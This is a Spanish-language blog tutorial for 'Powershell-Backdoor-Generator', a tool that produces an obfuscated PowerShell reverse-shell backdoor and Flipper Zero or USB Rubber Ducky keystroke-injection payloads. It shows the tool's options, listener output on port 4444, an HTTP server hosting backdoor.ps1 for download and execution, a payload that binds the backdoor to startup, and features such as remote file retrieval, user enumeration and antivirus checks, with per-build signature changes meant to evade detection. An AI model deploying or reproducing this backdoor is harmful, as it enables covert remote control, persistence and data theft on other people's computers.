Para crear una carga útil Flipper Zero / Hak5 USB Rubber Ducky

Para crear una carga útil Flipper Zero / Hak5 USB Rubber Ducky - Codelivly

 

Powershell-Backdoor-Generador es una puerta trasera inversa escrita en Powershell y ofuscada con Python. Permita que la puerta trasera tenga una nueva firma después de cada compilación. Con la capacidad de crear una carga útil del patito de goma USB Flipper Zero/Hak5.

usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
                 [--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]

Powershell Backdoor Generator

options:
  -h, --help            show this help message and exit
  --ip-address IP_ADDRESS, -i IP_ADDRESS
                        IP Address to bind the backdoor too (default: 192.168.X.XX)
  --port PORT, -p PORT  Port for the backdoor to connect over (default: 4444)
  --random, -r          Randomizes the outputed backdoor's file name
  --out OUT, -o OUT     Specify the backdoor filename (relative file names)
  --verbose, -v         Show verbose output
  --delay DELAY         Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
  --flipper FLIPPER     Payload file for flipper zero (includes EOL conversion) (relative file name)
  --ducky               Creates an inject.bin for the http server
  --server-port SERVER_PORT
                        Port to run the HTTP server on (--server) (default: 8080)
  --payload PAYLOAD     USB Rubber Ducky/Flipper Zero backdoor payload to execute
  --list--payloads      List all available payloads
  -k KEYBOARD, --keyboard KEYBOARD
                        Keyboard layout for Bad Usb/Flipper Zero (default: us)
  -A, --actually-listen
                        Just listen for any backdoor connections
  -H, --listen-and-host
                        Just listen for any backdoor connections and host the backdoor directory
Índice
  1. Características
  2. puerta trasera estándar
    1. Ejecución de puerta trasera
  3. Malos ataques USB / USB Rubber Ducky
  4. cargas útiles
  5. Puerta trasera Flipper Zero
  6. puerta trasera de pato de goma usb

Características

  • Carga útil del patito de goma Hak5
  • Carga útil Flipper cero
  • Descargar archivos desde un sistema remoto
  • Reproducir archivos wav desde URL
  • Recuperar la dirección IP pública de las computadoras de destino
  • Lista de usuarios locales
  • Encuentra archivos interesantes
  • Lista de información del sistema operativo
  • Buscar información del BIOS
  • Obtener el estado del antivirus
  • Obtener clientes TCP activos
  • Instalar Choco (https://chocolatey.org/)
  • Verifica el software de pentesting común instalado

puerta trasera estándar

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Se creará un archivo en el directorio de trabajo actual llamado backdoor.ps1

Ejecución de puerta trasera

Probado en Windows 11, Windows 10 y Kali Linux

powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1

Malos ataques USB / USB Rubber Ducky

Cuando usa uno de estos ataques, abre un servidor HTTP que aloja la puerta trasera. Una vez que se recupere la puerta trasera, el servidor HTTP se detendrá.

cargas útiles

  • Ejecutar — Ejecutar la puerta trasera
  • BindAndExecute: coloque la puerta trasera en el directorio temporal de los usuarios, vincule la puerta trasera al inicio y luego ejecútela. (Requiere un administrador)

Puerta trasera Flipper Zero

A continuación, se generará un archivo llamado powershell_backdoor.txt, que cuando se active en Flipper tomará la puerta trasera de su computadora a través de HTTP y la ejecutará.

C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Coloque el archivo de texto que especificó (por ejemplo: powershell_backdoor.txt) en su pinball cero. Cuando se ejecuta el payload, descarga y ejecuta backdoor.ps1

puerta trasera de pato de goma usb

A continuación se muestra un tutorial sobre cómo generar un archivo inject.bin para el patito de goma USB Hak5

 C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop

Se colocará un archivo llamado inject.bin en su directorio de trabajo actual. Se requiere Java para esta característica. Cuando se ejecuta el payload, descarga y ejecuta backdoor.ps1

Si quieres conocer otros artículos parecidos a Para crear una carga útil Flipper Zero / Hak5 USB Rubber Ducky puedes visitar la categoría Tutoriales.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir

Esta página web utiliza cookies para analizar de forma anónima y estadística el uso que haces de la web, mejorar los contenidos y tu experiencia de navegación. Para más información accede a la Política de Cookies . Ver mas